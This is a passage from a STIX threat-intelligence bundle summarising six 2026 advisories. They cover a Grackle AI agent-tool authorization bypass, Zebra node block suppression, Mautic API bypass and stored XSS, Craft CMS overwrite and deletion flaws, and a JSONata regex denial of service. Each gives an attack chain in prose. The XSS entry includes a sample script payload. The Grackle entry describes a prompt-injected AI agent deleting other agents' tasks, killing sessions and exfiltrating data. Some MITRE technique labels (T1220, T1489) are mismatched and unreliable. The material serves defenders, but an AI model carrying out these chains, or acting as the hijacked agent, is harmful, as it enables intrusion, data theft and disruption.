      "description": "## Overview\n\nGrackle AI's Multi-Agent Collaboration Protocol (MCP) tool layer, including `@grackle-ai/mcp`, `@grackle-ai/plugin-core`, and `@grackle-ai/auth` up to version `0.132.1`, contains critical authorization bypass vulnerabilities (GHSA-f9ff-5x35-7gfw). The core issue stems from inconsistent inline authorization checks within the tool layer, which is the *sole* authorization boundary for scoped callers. Because the MCP server authenticates all outbound gRPC with a full server API key and backend gRPC handlers perform no caller-based authorization, several mutating tools (`task_update`, `task_delete`, `task_resume`, `session_kill`, `session_resume`) silently omit necessary ancestry/workspace checks, effectively \"failing open.\" This allows a malicious or prompt-injected scoped agent to perform unauthorized cross-task and cross-session operations, enabling IDOR, privilege escalation, and denial of service. Additionally, a flaw in handling workspaceless sessions allows for cross-workspace read-only data disclosure. The vulnerability was published on July 2, 2026.\n\n## Attack Chain\n\n1.  **Initial Access/Compromise**: An attacker gains control over an existing Grackle AI \"scoped agent\" within a customer environment, potentially through prompt injection, misconfiguration, or compromising the underlying system hosting the agent.\n2.  **Task ID Enumeration (F2)**: The compromised scoped agent leverages legitimate tools like `task_list` or `task_search` to discover `taskId` values belonging to other tasks, including those of sibling agents, parent tasks, or tasks in different workspaces.\n3.  **Cross-Workspace Discovery (F7)**: If the compromised agent operates from a workspaceless session, it exploits the `workspaceId: undefined` bypass in `mcp-server.ts` to call `task_list` (without arguments) and retrieve information about *all* tasks across *all* workspaces within the Grackle AI instance.\n4.  **Unauthorized Data Disclosure (F7)**: Using the enumerated `taskId` values, the agent then calls `task_show {taskId}` or `schedule_show` to access and potentially exfiltrate sensitive details (e.g., title, description, branch, review notes) from tasks it is not authorized to view across workspaces.\n5.  **Task Data Manipulation/Destruction (F2)**: The agent invokes `task_update`, `task_delete`, or `task_resume` with arbitrary `taskId` values (bypassing ancestry checks), allowing it to modify (e.g., change status to `complete`/`failed`, rewrite dependency DAG/budgets) or permanently delete tasks belonging to other agents or the human orchestrator.\n6.  **Session Denial of Service / Hijacking (F6)**: The agent calls `session_kill {sessionId}` or `session_resume {sessionId}` (bypassing ancestry checks) to terminate or resume active sessions of other agents or the root orchestrator, leading to a denial of service or unauthorized session control.\n\n## Impact\n\nThe vulnerabilities allow a compromised Grackle AI scoped agent to escalate privileges, gain unauthorized access to sensitive data, and disrupt operations. Specifically, attackers can permanently destroy other agents' or the human orchestrator's work, corrupt task dependency graphs and budgets, terminate other active sessions (leading to a denial of service for sibling agents or the root orchestrator), hijack foreign sessions, and exfiltrate sensitive task metadata (titles, descriptions, branch info, review notes) from any workspace. The \"fail-open\" nature means new tools can introduce similar vulnerabilities if ancestry checks are omitted, making the system inherently fragile. The advisory covers systemic findings F2, F6, F7, and F12.\n\n## Recommendation\n\n*   Prioritize updating all `@grackle-ai/mcp`, `@grackle-ai/plugin-core`, and `@grackle-ai/auth` packages to versions *greater than* `0.132.1` to address GHSA-f9ff-5x35-7gfw.\n*   Ensure that the remediation for GHSA-f9ff-5x35-7gfw, specifically the enforcement of scope centrally in the `CallToolRequest` dispatcher (`mcp-server.ts`) via `targetTaskIdArg` / `targetSessionIdArg` descriptors, is fully implemented and operational.\n*   Verify that `assertCallerIsAncestor` or equivalent self-or-ancestor checks have been added to `task_update`, `task_delete`, `task_resume`, `session_kill`, and `session_resume` as described in the remediation for GHSA-f9ff-5x35-7gfw.\n*   Confirm that the fix for F7, preventing failure-open on empty `workspaceId` and applying `task_show` membership checks for all scoped non-root callers, is properly deployed per GHSA-f9ff-5x35-7gfw.\n*   If `scoped-token.ts` (F12) is wired into task-abort/stop flows with SQLite-backed persistence, ensure this feature is functional to allow for proper scoped token revocation, as recommended in GHSA-f9ff-5x35-7gfw.\n",
      "published": "2026-07-03T11:35:34Z",
      "labels": [
        "idor",
        "authorization-bypass",
        "privilege-escalation",
        "denial-of-service",
        "code-vulnerability",
        "software-component"
      ],
      "object_refs": [
        "attack-pattern--03c83a54-7fcd-5e1a-99d5-88d0bbd8fb19",
        "attack-pattern--15983b63-d99e-55d9-9324-bf68f3de5563",
        "attack-pattern--5d4f3482-da19-5c2a-9f5c-b4aebcbb7c04"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/advisories/GHSA-f9ff-5x35-7gfw"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploit Public-Facing Application",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--d90c3bc3-0c6b-5bc2-95fe-cbaacebc2fa9",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--8c59d463-632e-57df-9006-6e1ba1d51151",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--15983b63-d99e-55d9-9324-bf68f3de5563",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Endpoint Denial of Service",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1499",
          "url": "https://attack.mitre.org/techniques/T1499"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--9b0f7671-8259-5627-b738-79d2a7c923e1",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--8c59d463-632e-57df-9006-6e1ba1d51151",
      "target_ref": "attack-pattern--15983b63-d99e-55d9-9324-bf68f3de5563"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--8c59d463-632e-57df-9006-6e1ba1d51151",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Zebra Block Suppression Vulnerability (CVE-2026-52736) via P2P Body Poisoning",
      "description": "## Overview\n\nA high-severity vulnerability, CVE-2026-52736, affects Zebra's `zebrad` blockchain nodes, specifically versions up to `v4.4.1`, as well as `zebra-state` up to `v6.0.0`. This flaw allows a remote, unauthenticated attacker to conduct a denial-of-service attack against a target node by exploiting a caching issue in how `zebrad` handles block hashes. By leveraging coinbase scriptSig malleability (ZIP-244 `txid_v5`) to create a poisoned block body with the same header hash as a legitimate canonical block, an attacker can cause the node to cache the hash and then reject the actual valid block as a duplicate. This leads to the node permanently stalling at a specific block height, diverging from the network tip, and preventing downstream services like lightwalletd, wallets, and explorers from advancing. The attack requires winning a propagation race to deliver the poisoned block before honest peers deliver the canonical one, which a well-positioned attacker can reliably achieve.\n\n## Attack Chain\n\n1.  Attacker observes a new block header from any peer on the network.\n2.  Attacker constructs a poisoned block body that has an identical header hash to the observed block, achieved by mutating the coinbase `scriptSig` extra-data section.\n3.  Attacker advertises the hash of this specially crafted block to the target Zebra node via an `inv` (inventory) message over the P2P network.\n4.  The target Zebra node requests the advertised block via a `getdata` message, and the attacker serves the poisoned body.\n5.  Zebra adds the block hash to its `non_finalized_block_write_sent_hashes` cache before completing contextual validation of the block body.\n6.  The write task within Zebra subsequently rejects the poisoned body due to an `auth_data_root` mismatch (specifically, `block_commitment_is_valid_for_chain_history` fails), but the hash is not removed from the `non_finalized_block_write_sent_hashes` cache.\n7.  When the valid, canonical block later arrives from honest peers or an RPC connection, Zebra's `queue_and_commit_to_non_finalized_state` function sees the hash already in the cache and erroneously treats it as a duplicate, returning `KnownBlock::WriteChannel`.\n8.  The target Zebra node fails to advance past the affected block height (N-1), becoming permanently stalled until a manual restart (which clears the in-memory cache) or a rare chain reorg event occurs.\n\n## Impact\n\nSuccessful exploitation of CVE-2026-52736 leads to a permanent denial of service for the targeted Zebra node, causing it to diverge from the main blockchain network. This renders the node unable to process new blocks, effectively stalling its operation. Downstream services and applications that rely on the affected node, such as lightwallets, block explorers, and potentially mining infrastructure, will experience service degradation or complete outages due to an inability to access up-to-date blockchain data. Recovery from this attack typically requires manual intervention, specifically restarting the `zebrad` process to clear the in-memory sent-hash cache, or waiting for an unlikely chain reorg at the stalled height. There is no information on specific victim counts or sectors, but any organization operating vulnerable Zebra nodes is at risk.\n\n## Recommendation\n\n*   Immediately patch all `zebrad` nodes to version `v4.4.2` or later to remediate CVE-2026-52736, which includes a fix for removing stale entries from the sent-hash cache.\n*   While not a complete solution for CVE-2026-52736, consider reducing the `network.peerset_initial_target_size` configuration to narrow the attack surface by limiting the number of inbound P2P connections.\n*   Be prepared to restart `zebrad` nodes if they stall at a specific block height, as this is the primary recovery mechanism to clear the in-memory `non_finalized_block_write_sent_hashes` cache.\n",
      "published": "2026-07-03T11:34:34Z",
      "labels": [
        "blockchain",
        "denial-of-service",
        "network",
        "vulnerability"
      ],
      "object_refs": [
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
        "attack-pattern--15983b63-d99e-55d9-9324-bf68f3de5563"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/advisories/GHSA-4m69-67m6-prqp"
        }
      ],
      "confidence": 60
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--5817493e-ef12-5a84-adbd-e6ff66112ecd",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Valid Accounts",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1078",
          "url": "https://attack.mitre.org/techniques/T1078"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--da300949-3748-53bf-b636-aa9df858e28a",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--9493a7f0-a025-5f7f-ab73-9fe3b16e0c35",
      "target_ref": "attack-pattern--5817493e-ef12-5a84-adbd-e6ff66112ecd"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--d392c2fa-8316-5745-99ae-926c1e2b8ee9",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploit Public-Facing Application",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1220",
          "url": "https://attack.mitre.org/techniques/T1220"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--6d43a3b3-16b0-5d37-af00-db9a9c1c61e8",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--9493a7f0-a025-5f7f-ab73-9fe3b16e0c35",
      "target_ref": "attack-pattern--d392c2fa-8316-5745-99ae-926c1e2b8ee9"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--9493a7f0-a025-5f7f-ab73-9fe3b16e0c35",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Mautic 7 API v2 Authorization Bypass (CVE-2026-9808)",
      "description": "## Overview\n\nAn authorization bypass vulnerability, identified as CVE-2026-9808, has been discovered in Mautic Core versions 7.0.0 through 7.1.1. This flaw affects the API v2 endpoints, which utilize API Platform, and prevents the proper enforcement of owner-scope restrictions such as `viewown` or `editown`. Attackers, who are low-privilege authenticated API users, can leverage this vulnerability to gain unauthorized access to or modify resources belonging to other users. This bypasses the intended ownership-logic controls and structural tenant and privilege boundaries within the Mautic platform, potentially leading to data exposure or manipulation. This issue was publicly disclosed on July 2, 2026, and poses a significant risk to organizations managing sensitive marketing data through affected Mautic instances.\n\n## Attack Chain\n\n1.  Attacker obtains valid, low-privilege API credentials for a Mautic 7 instance (e.g., through credential compromise or an insider threat).\n2.  Attacker authenticates to the Mautic API v2 endpoint using these credentials.\n3.  Attacker crafts an API request targeting a resource (e.g., a specific contact, company, or report ID) that belongs to a different user or tenant.\n4.  The crafted API request is sent to an affected Mautic API v2 endpoint, leveraging the vulnerability where owner-scope restrictions are not properly enforced.\n5.  Mautic's API Platform processing component fails to apply the `viewown` or `editown` authorization checks for the requested resource.\n6.  The Mautic application grants the attacker unauthorized read or write access to the targeted resource.\n7.  Attacker successfully retrieves sensitive data or manipulates records they should not have access to, bypassing the intended security controls.\n\n## Impact\n\nAuthenticated API users with limited roles can exploit CVE-2026-9808 to read or modify restricted resources, such as reports, contacts, and companies, that they do not own and should not have access to. This directly bypasses structural tenant and privilege boundaries on the platform, leading to unauthorized data exposure, data tampering, and potential reputational damage for affected organizations. While the number of victims is not specified, any organization utilizing Mautic Core versions 7.0.0 through 7.1.1 is vulnerable to this critical authorization flaw, particularly those with multi-tenant deployments or strict internal access controls.\n\n## Recommendation\n\n*   Patch CVE-2026-9808 immediately by upgrading Mautic Core to version 7.1.2 or later.\n*   Temporarily revoke API credentials or narrow access permissions for any users whose roles rely on owner-scope permission containment, if immediate patching of CVE-2026-9808 is not feasible.\n",
      "published": "2026-07-03T11:33:37Z",
      "labels": [
        "mautic",
        "authorization-bypass",
        "api",
        "web-application"
      ],
      "object_refs": [
        "attack-pattern--5817493e-ef12-5a84-adbd-e6ff66112ecd",
        "attack-pattern--d392c2fa-8316-5745-99ae-926c1e2b8ee9"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/advisories/GHSA-2jrw-c95w-h43g"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Command and Scripting Interpreter",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1059",
          "url": "https://attack.mitre.org/techniques/T1059"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--047a94ab-dd4d-5456-b471-09ede8e0afc2",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--344b5883-e6f6-5e3b-9fe4-decea6610aae",
      "target_ref": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--9d6de9ca-c127-5a88-a5f8-975f04ba0874",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Create Account",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1136",
          "url": "https://attack.mitre.org/techniques/T1136"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--d4af7944-b318-5d68-8511-cd574287734d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--344b5883-e6f6-5e3b-9fe4-decea6610aae",
      "target_ref": "attack-pattern--9d6de9ca-c127-5a88-a5f8-975f04ba0874"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--5817493e-ef12-5a84-adbd-e6ff66112ecd",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Valid Accounts",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1078",
          "url": "https://attack.mitre.org/techniques/T1078"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--4e55b261-06d1-5586-837c-34255baf7465",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--344b5883-e6f6-5e3b-9fe4-decea6610aae",
      "target_ref": "attack-pattern--5817493e-ef12-5a84-adbd-e6ff66112ecd"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--344b5883-e6f6-5e3b-9fe4-decea6610aae",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Mautic Stored XSS in Projects Component (CVE-2026-9809)",
      "description": "## Overview\n\nA significant stored Cross-Site Scripting (XSS) vulnerability (CVE-2026-9809) has been discovered in the Projects component of Mautic version 7. This flaw permits an authenticated attacker with permissions to create or edit projects to inject arbitrary malicious JavaScript into project names. When these unsanitized project names are subsequently rendered in administrative detail views (such as campaigns or forms) and an administrative user hovers over the associated project tag or popover, the injected script executes within the victim's browser context. This could lead to session hijacking, unauthorized administrative actions, modification of system configurations, or exfiltration of sensitive organizational data. The vulnerability specifically affects Mautic versions 7.0.0 through 7.1.1 and has been addressed in version 7.1.2. Mautic 6.x, 5.x, and 4.x branches are not impacted as they do not include the Projects feature.\n\n## Attack Chain\n\n1.  An attacker gains legitimate, authenticated access to a Mautic 7 instance with permissions to create or modify projects.\n2.  Using the Mautic administrative interface, the attacker navigates to the project creation or editing functionality.\n3.  The attacker creates a new project or modifies an existing one, injecting a malicious script payload (e.g., `\u003cscript\u003ealert(document.domain)\u003c/script\u003e`) into the project name field.\n4.  Mautic stores this unsanitized project name, including the malicious script, in its backend database.\n5.  A victim administrative user accesses an administrative detail view (e.g., a campaign or email detail page) that displays entities associated with the compromised project.\n6.  As the victim user hovers their mouse cursor over the malicious project's tag or a related popover on the administrative detail page, the unsanitized project name is rendered client-side.\n7.  The malicious JavaScript code, embedded within the project name, executes within the victim's web browser in the context of their Mautic session.\n8.  The executed script hijacks the victim's session, exfiltrates sensitive information, performs unauthorized administrative actions, or alters system configurations on behalf of the victim.\n\n## Impact\n\nSuccessful exploitation of CVE-2026-9809 grants attackers the ability to execute arbitrary JavaScript code within the context of an unsuspecting administrative user's Mautic session. This direct access to the victim's browser session allows for significant consequences including, but not limited to, session hijacking, exfiltration of sensitive data, unauthorized modification of Mautic's system configurations, or even complete administrative control over the Mautic instance. While no specific victim counts or sectors are detailed, any organization utilizing Mautic 7 (versions 7.0.0 to 7.1.1) for marketing automation is vulnerable to these severe data integrity and confidentiality risks if an authenticated user with project management permissions is compromised or malicious.\n\n## Recommendation\n\n*   **Patch CVE-2026-9809** by upgrading all Mautic 7 installations to version 7.1.2 or later immediately.\n*   Restrict project creation and modification permissions to only highly trusted administrative users within your Mautic instance to mitigate the risk until patching is complete.\n",
      "published": "2026-07-03T11:32:44Z",
      "labels": [
        "xss",
        "web-application",
        "mautic",
        "cve"
      ],
      "object_refs": [
        "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
        "attack-pattern--9d6de9ca-c127-5a88-a5f8-975f04ba0874",
        "attack-pattern--5817493e-ef12-5a84-adbd-e6ff66112ecd"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/advisories/GHSA-7h65-whp7-rgqf"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--625bcfd0-9318-5abf-8fe9-295efe008e12",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Data Manipulation",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1565",
          "url": "https://attack.mitre.org/techniques/T1565"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--e43b7720-827a-57c5-95ce-27f7b80e6685",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--f08564f5-e8dd-592f-b512-6b3c5d7112ae",
      "target_ref": "attack-pattern--625bcfd0-9318-5abf-8fe9-295efe008e12"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--f08564f5-e8dd-592f-b512-6b3c5d7112ae",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Craft CMS Mass Assignment Vulnerability Allows Element Overwrites (CVE-2026-50281)",
      "description": "## Overview\n\nA critical mass assignment flaw (CVE-2026-50281) has been identified in Craft CMS versions 5.7.0 through 5.9.20, enabling low-privileged authenticated users to corrupt content integrity across the entire installation. This vulnerability, disclosed on July 2, 2026, stems from insufficient input validation within the `actionBulkDuplicate()` function. An attacker with basic entry duplication permissions can craft a request that includes a target element's `id` within the `newAttributes` parameter. This malicious `id` bypasses the system's intended `id = null` reset during the duplication process, leading the application to overwrite an existing element's data in the database instead of creating a new one. This flaw allows unauthorized modification of any element an attacker can predict or enumerate, significantly impacting data integrity.\n\n## Attack Chain\n\n1.  An authenticated attacker, possessing only the permission to duplicate an entry they own, logs into the Craft CMS administrative interface.\n2.  The attacker crafts a malicious HTTP POST request to the `actionBulkDuplicate` endpoint (e.g., `/admin/actions/elements/bulk-duplicate`).\n3.  This request includes two required parameters: `elements` (identifying an entry the attacker owns) and `newAttributes`.\n4.  Within the `newAttributes` parameter, the attacker injects a `id` field containing the numeric primary key of an existing target element owned by another user or administrative account.\n5.  The `ElementsController::actionBulkDuplicate` method processes this request, passing the `newAttributes` parameter to the service layer without performing an explicit `id` validation check for nested attributes.\n6.  `Elements::duplicateElement` attempts to clone the source element and explicitly sets the new element's `id` to `null` in preparation for a new database record.\n7.  Immediately afterward, `Craft::configure` applies the attacker-provided `newAttributes` array to the cloned element. Due to `id` being present in `safeAttributes()`, the attacker's `id` value overwrites the `id=null` value.\n8.  The underlying database save operation (via Yii's `saveElement()`) then performs an `UPDATE` on the database row identified by the attacker-controlled `id`, effectively overwriting the target element's data with the attacker's supplied content.\n\n## Impact\n\nSuccessful exploitation of CVE-2026-50281 allows a low-privileged authenticated user to overwrite the data of any existing elements within the Craft CMS installation. This includes entries, categories, and even user accounts that share the `Entry` element table inheritance. The primary impact is a complete loss of content integrity, as an attacker can arbitrarily modify or deface content owned by other users or even administrative content. This can lead to misinformation, reputational damage, and potentially further compromise if critical information in other elements is overwritten. The attack requires only the ability to duplicate an existing entry.\n\n## Recommendation\n\n*   Patch CVE-2026-50281 immediately by upgrading Craft CMS to version 5.9.21 or later.\n*   Review access control configurations for all users to ensure the principle of least privilege is applied, especially regarding content creation and duplication permissions.\n",
      "published": "2026-07-03T11:31:44Z",
      "labels": [
        "web-application",
        "vulnerability",
        "mass-assignment",
        "cve",
        "cms"
      ],
      "object_refs": [
        "attack-pattern--625bcfd0-9318-5abf-8fe9-295efe008e12"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/advisories/GHSA-x5m4-g2cq-52pq"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--bcb7aac1-0720-51b7-a9c7-65d3bf929d34",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Data Destruction",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1489",
          "url": "https://attack.mitre.org/techniques/T1489"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--463d6b73-79e7-55c5-be69-3fce93a51f16",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--788f24a2-a7cd-5eae-a322-a2f67023ce7e",
      "target_ref": "attack-pattern--bcb7aac1-0720-51b7-a9c7-65d3bf929d34"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--788f24a2-a7cd-5eae-a322-a2f67023ce7e",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Craft CMS Vulnerable to Unauthorized Folder Deletion (CVE-2026-50282)",
      "description": "## Overview\n\nA high-severity vulnerability (CVE-2026-50282) has been identified in Craft CMS versions 4.x and 5.x, where an authenticated user can perform unauthorized deletion of destination folders during a forced move operation. Specifically, Craft CMS versions `5.0.0-RC1` through `5.9.20` and `4.0.0-RC1` through `4.17.13` are affected. The flaw resides in `craft\\controllers\\AssetsController::actionMoveFolder()`, which permits a folder to be overwritten at the destination if `force=true` is used, without properly verifying `deleteAssets` permission for the destination volume. This oversight allows an attacker with legitimate access but lacking explicit delete privileges to eliminate arbitrary destination folders and their contents, leading to data loss, broken asset references within entries and fields, and significant operational disruption for affected organizations utilizing Craft CMS.\n\n## Attack Chain\n\n1.  An authenticated attacker logs into the Craft CMS administrative interface.\n2.  The attacker identifies an existing asset folder, `MaliciousFolder`, and a target destination parent folder, `TargetDestination`, where another legitimate folder (`VictimFolder`) with the same name as `MaliciousFolder` already exists.\n3.  The attacker prepares a move operation for `MaliciousFolder` into `TargetDestination`.\n4.  The attacker crafts a request to `craft\\controllers\\AssetsController::actionMoveFolder()` specifying `MaliciousFolder` as the source, `TargetDestination` as the destination, and includes the `force=true` parameter.\n5.  Despite the attacker lacking `deleteAssets` permission for the volume containing `VictimFolder` within `TargetDestination`, the Craft CMS application logic proceeds.\n6.  The application detects the name conflict and, due to the `force=true` parameter, initiates the deletion of `VictimFolder` and all its contents using `assets-\u003edeleteFoldersByIds($existingFolder-\u003eid)` or `targetVolume-\u003edeleteDirectory()`.\n7.  Subsequently, `MaliciousFolder` is moved into `TargetDestination`.\n8.  The unauthorized deletion of `VictimFolder` results in data loss, broken asset references in site content, and operational disruption.\n\n## Impact\n\nThis vulnerability allows an authenticated user, even without explicit delete permissions on the destination volume, to force the deletion of folders and their contents. The direct consequence is asset loss, potentially affecting critical site content and media. This can lead to broken references throughout the Craft CMS instance, rendering parts of the website non-functional or displaying incorrect information. Organizations using affected versions of Craft CMS could face significant operational disruption, data recovery efforts, and reputational damage due to the loss of digital assets.\n\n## Recommendation\n\n*   Immediately apply available patches for Craft CMS, upgrading affected installations to versions `5.9.21` or `4.17.14` or later to remediate CVE-2026-50282.\n*   Review and strictly enforce user role permissions within Craft CMS, particularly for `deleteAssets` and `createFolders` on asset volumes, as this vulnerability allows an authorization bypass related to these.\n*   Ensure comprehensive web server access logging is enabled for your Craft CMS instance. Specifically, monitor for `POST` requests to `/admin/actions/assets/move-folder` that include the `force=true` parameter, especially when originating from user accounts with limited asset management privileges.\n",
      "published": "2026-07-03T11:30:48Z",
      "labels": [
        "authorization-bypass",
        "cms",
        "craft-cms",
        "webserver",
        "cve"
      ],
      "object_refs": [
        "attack-pattern--bcb7aac1-0720-51b7-a9c7-65d3bf929d34"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/advisories/GHSA-3w32-23wj-rxg3"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--15983b63-d99e-55d9-9324-bf68f3de5563",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Endpoint Denial of Service",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1499",
          "url": "https://attack.mitre.org/techniques/T1499"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--c3de1d39-a4d0-5a6f-bb25-65a5fc4ced31",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6479e248-3147-5894-972f-1574a55857d2",
      "target_ref": "attack-pattern--15983b63-d99e-55d9-9324-bf68f3de5563"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--6479e248-3147-5894-972f-1574a55857d2",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "JSONata $toMillis Function Vulnerability Leads to Denial of Service (CVE-2026-52746)",
      "description": "## Overview\n\nA critical vulnerability, CVE-2026-52746, has been identified in JSONata versions prior to 2.2.0. This flaw enables attackers to initiate a denial of service (DoS) by leveraging specially crafted, non-matching inputs to the `$toMillis` function. These malicious inputs trigger superlinear backtracking within the ISO-8601 validation regex, resulting in significant CPU resource consumption. Applications that evaluate user-provided JSONata expressions are particularly susceptible, as exploitation can render them unresponsive or cause crashes. The issue was disclosed by Doruk Tan Öztürk and has been addressed in JSONata version 2.2.0 through fixes implemented in pull requests #782 and #793. Developers are urged to update their JSONata dependencies immediately to mitigate this risk.\n\n## Attack Chain\n\n1.  **Attacker crafts malicious JSONata expression**: An attacker creates a JSONata expression specifically designed with non-matching inputs for the `$toMillis` function.\n2.  **Attacker delivers expression to vulnerable application**: The malicious JSONata expression is submitted to a web application or service that processes user-controlled JSONata queries.\n3.  **Vulnerable application evaluates expression**: The application, running an affected JSONata version (`\u003c 2.2.0`), attempts to evaluate the provided expression and validate the `$toMillis` input using its ISO-8601 regex.\n4.  **Regex backtracking consumes excessive resources**: The malformed input triggers a superlinear backtracking issue within the ISO-8601 validation regex, leading to a significant increase in the application's CPU utilization.\n5.  **Application becomes unresponsive**: Due to the consumed resources, the application experiences a denial of service, becoming slow, unresponsive, or crashing entirely.\n\n## Impact\n\nSuccessful exploitation of CVE-2026-52746 results in a denial of service (DoS) condition for applications utilizing vulnerable JSONata versions. Affected organizations may experience application unresponsiveness, service outages, and potential data processing interruptions. While no specific victim counts or targeted sectors were provided, any application parsing untrusted JSONata expressions is at risk of resource exhaustion and service disruption.\n\n## Recommendation\n\n*   Immediately upgrade JSONata to version `2.2.0` or newer to patch CVE-2026-52746.\n*   Review applications that process user-provided JSONata expressions to ensure they are using patched versions of `npm/jsonata`.\n",
      "published": "2026-07-03T11:29:50Z",
      "labels": [
        "denial-of-service",
        "nodejs",
        "vulnerability",
        "CVE-2026-52746"
      ],
      "object_refs": [
        "attack-pattern--15983b63-d99e-55d9-9324-bf68f3de5563"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/advisories/GHSA-86vw-mfpg-wwv9"
        },
        {
